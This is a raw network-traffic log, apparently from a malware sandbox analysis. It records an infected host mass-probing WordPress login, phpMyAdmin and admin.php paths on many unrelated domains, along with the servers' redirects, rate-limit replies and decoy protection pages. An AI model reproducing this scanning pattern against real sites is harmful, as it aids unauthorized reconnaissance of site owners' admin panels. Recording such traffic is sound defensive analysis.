Feb 21, 2024 00:26:10.947578907 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 38 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 Data Ascii: } .sk-circle .sk-circle8 {-webkit-transform: rotate(210deg);-ms-transform: rotate(210deg);transform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform:
Feb 21, 2024 00:26:10.947731972 CET	1286	IN	Data Raw: 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c Data Ascii: re {-webkit-animation-delay: -0.5s;animation-delay: -0.5s; } .sk-circle .sk-circle9:before {-webkit-animation-delay: -0.4s;animation-delay: -0.4s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animati
Feb 21, 2024 00:26:10.948010921 CET	1286	IN	Data Raw: 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 62 72 6f 77 73 65 72 49 6e 74 65 67 72 69 74 79 43 68 65 63 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: }, 1000); } function browserIntegrityCheck() { w = window.innerWidth; h = window.innerHeight; arr = [w, h, Math.floor((Math.random() * 9) + 1)]; arr.pus
Feb 21, 2024 00:26:10.948110104 CET	1286	IN	Data Raw: 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 20 3d 20 22 41 42 43 44 45 46 47 48 49 Data Ascii: tring() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.
Feb 21, 2024 00:26:10.948152065 CET	1286	IN	Data Raw: 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 Data Ascii: "center" valign="middle"> <div> <noscript> <h1 style="color:#990000;">Please, turn Javascript on in your browser then reload the page.</h1> </noscript>
Feb 21, 2024 00:26:10.948244095 CET	1286	IN	Data Raw: 20 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 69 6e 67 20 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 20 73 65 63 75 72 65 6c 79 e2 80 a6 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 Data Ascii: <h1>Accessing /PhpMyAdmin/ securely</h1> <span>This is an automatic process. Your browser will redirect to your requested content in <span id="seconds">5</span> seconds.</span> </di
Feb 21, 2024 00:26:10.948333979 CET	1286	IN	Data Raw: 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 61 63 61 6a 6f 6f 6d 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 63 6f 6e 74 65 6e 74 27 3e 54 68 69 73 20 63 6f Data Ascii: t /components/com_acajoom/ </a><br><a href='index.php?option=com_content'>This contact form is about /components/com_content/ </a><br><a href='index.php?option=com_phocagallery'>This contact form is about /components/com_phocagallery/ </a><b
Feb 21, 2024 00:26:10.948401928 CET	1286	IN	Data Raw: 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 46 43 4b 65 64 69 74 6f 72 20 2d 20 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 Data Ascii: Uploaders Tests'>This contact form is about /components/FCKeditor - Uploaders Tests/ </a><br><a href='index.php?option=phpmyadmin'>This contact form is about /components/phpmyadmin/ </a><br><a href='index.php?option=phpmyadmin2'>This contact
Feb 21, 2024 00:26:10.948436975 CET	1080	IN	Data Raw: 72 72 65 6c 4d 61 69 6c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 34 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 73 72 63 20 65 78 74 3a 70 68 70 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 64 65 6d 6f 2f 3f 47 48 48 20 76 Data Ascii: rrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - WebUtil 2.7">GHDB Signature #1013 ("SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - .mdb/admin.mdb">GHDB S

Session ID	Source IP	Source Port	Destination IP	Destination Port
208	192.168.2.6	58876	23.236.62.147	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.819128036 CET	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.034132957 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/phpmyadmin strict-transport-security: max-age=3600 x-wix-request-id: 1708471570.910735827999125519 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLjmaS7Ki5l/bn9NiiirFyVEm++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRalgCuSto2c33z77K1dupefa08wLWgInBOICDRDed+NZObCsOYd1iVVKQRUC8XQP9elQ= Data Raw: Data Ascii:
Feb 21, 2024 00:26:11.034230947 CET	261	IN	Data Raw: 2c 32 55 4e 56 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 49 4e 42 2f 62 41 6f 6a 66 48 6a 41 42 32 6a 45 4f 77 33 47 6a 6b 52 32 72 78 43 54 67 61 4a 37 2f 4b 32 4b 78 39 6a 68 41 66 43 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 6d 37 38 Data Ascii: ,2UNV7KOq4oGjA5+PKsX47INB/bAojfHjAB2jEOw3GjkR2rxCTgaJ7/K2Kx9jhAfC,R8nVwPJv9QJL1m78OROO+O9xU1dn3Y1oNq7RDoqd004=,9n3wTMzaU7zAZzBAj7gVUwtnxUH4nQ/WU2H5dBaXf2n4D2PFRhC5HA4zrltzn4LTLHzJs+hgMv0cTQHOciUUfQ==Cache-Control: no-cacheX-Content-Type-Op

Session ID	Source IP	Source Port	Destination IP	Destination Port
209	192.168.2.6	58964	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.871570110 CET	172	OUT	GET /admin.php HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.060215950 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Length: 13691 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-ali
Feb 21, 2024 00:26:11.060277939 CET	1286	IN	Data Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a Data Ascii: gn: center;} .link {margin-top: 40px;} .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;}
Feb 21, 2024 00:26:11.060419083 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 38 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 Data Ascii: } .sk-circle .sk-circle8 {-webkit-transform: rotate(210deg);-ms-transform: rotate(210deg);transform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform:
Feb 21, 2024 00:26:11.060473919 CET	1286	IN	Data Raw: 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c Data Ascii: re {-webkit-animation-delay: -0.5s;animation-delay: -0.5s; } .sk-circle .sk-circle9:before {-webkit-animation-delay: -0.4s;animation-delay: -0.4s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animati
Feb 21, 2024 00:26:11.060606003 CET	1286	IN	Data Raw: 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 62 72 6f 77 73 65 72 49 6e 74 65 67 72 69 74 79 43 68 65 63 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: }, 1000); } function browserIntegrityCheck() { w = window.innerWidth; h = window.innerHeight; arr = [w, h, Math.floor((Math.random() * 9) + 1)]; arr.pus
Feb 21, 2024 00:26:11.060656071 CET	1286	IN	Data Raw: 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 20 3d 20 22 41 42 43 44 45 46 47 48 49 Data Ascii: tring() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.
Feb 21, 2024 00:26:11.060726881 CET	1286	IN	Data Raw: 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 Data Ascii: "center" valign="middle"> <div> <noscript> <h1 style="color:#990000;">Please, turn Javascript on in your browser then reload the page.</h1> </noscript>
Feb 21, 2024 00:26:11.060882092 CET	1286	IN	Data Raw: 20 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 69 6e 67 20 2f 61 64 6d 69 6e 2e 70 68 70 20 73 65 63 75 72 65 6c 79 e2 80 a6 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e Data Ascii: <h1>Accessing /admin.php securely</h1> <span>This is an automatic process. Your browser will redirect to your requested content in <span id="seconds">5</span> seconds.</span> </div>
Feb 21, 2024 00:26:11.060981989 CET	1286	IN	Data Raw: 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 61 63 61 6a 6f 6f 6d 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 63 6f 6e 74 65 6e 74 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 Data Ascii: omponents/com_acajoom/ </a><br><a href='index.php?option=com_content'>This contact form is about /components/com_content/ </a><br><a href='index.php?option=com_phocagallery'>This contact form is about /components/com_phocagallery/ </a><br><
Feb 21, 2024 00:26:11.061086893 CET	1286	IN	Data Raw: 61 64 65 72 73 20 54 65 73 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 46 43 4b 65 64 69 74 6f 72 20 2d 20 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 73 2f 20 3c Data Ascii: aders Tests'>This contact form is about /components/FCKeditor - Uploaders Tests/ </a><br><a href='index.php?option=phpmyadmin'>This contact form is about /components/phpmyadmin/ </a><br><a href='index.php?option=phpmyadmin2'>This contact for
Feb 21, 2024 00:26:11.061135054 CET	1076	IN	Data Raw: 4d 61 69 6c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 34 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 73 72 63 20 65 78 74 3a 70 68 70 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 64 65 6d 6f 2f 3f 47 48 48 20 76 31 2e 31 20 Data Ascii: Mail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - WebUtil 2.7">GHDB Signature #1013 ("SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - .mdb/admin.mdb">GHDB Signa

Session ID	Source IP	Source Port	Destination IP	Destination Port
210	192.168.2.6	59052	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.876113892 CET	172	OUT	GET /wp-login.php HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.973150969 CET	222	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/wp-login.php ETag: "65d0dd59-0"
Feb 21, 2024 00:26:12.803589106 CET	374	OUT	GET /wp-admin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://att.com.au/wp-login.php
Feb 21, 2024 00:26:12.901329041 CET	219	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/wp-admin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
211	192.168.2.6	59059	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.882339954 CET	176	OUT	GET /wp-login.php HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.979679108 CET	226	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/wp-login.php ETag: "65d0dd59-0"
Feb 21, 2024 00:26:12.500941992 CET	384	OUT	GET /wp-admin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://acidvision.com/wp-login.php
Feb 21, 2024 00:26:12.596574068 CET	223	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/wp-admin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
212	192.168.2.6	59067	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.884287119 CET	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.981015921 CET	224	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/phpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
213	192.168.2.6	58972	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.901117086 CET	216	OUT	GET /wp-admin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://hotmail.fr.au/wp-login.php
Feb 21, 2024 00:26:11.061196089 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
214	192.168.2.6	58973	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.901124001 CET	216	OUT	GET /wp-admin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://hotmail.fr.au/wp-login.php
Feb 21, 2024 00:26:11.061332941 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
215	192.168.2.6	59019	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.912239075 CET	172	OUT	GET /admin.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.082043886 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
216	192.168.2.6	59018	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.912240982 CET	172	OUT	GET /admin.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.071191072 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
217	192.168.2.6	58994	91.136.8.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.912303925 CET	172	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: derbyron.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
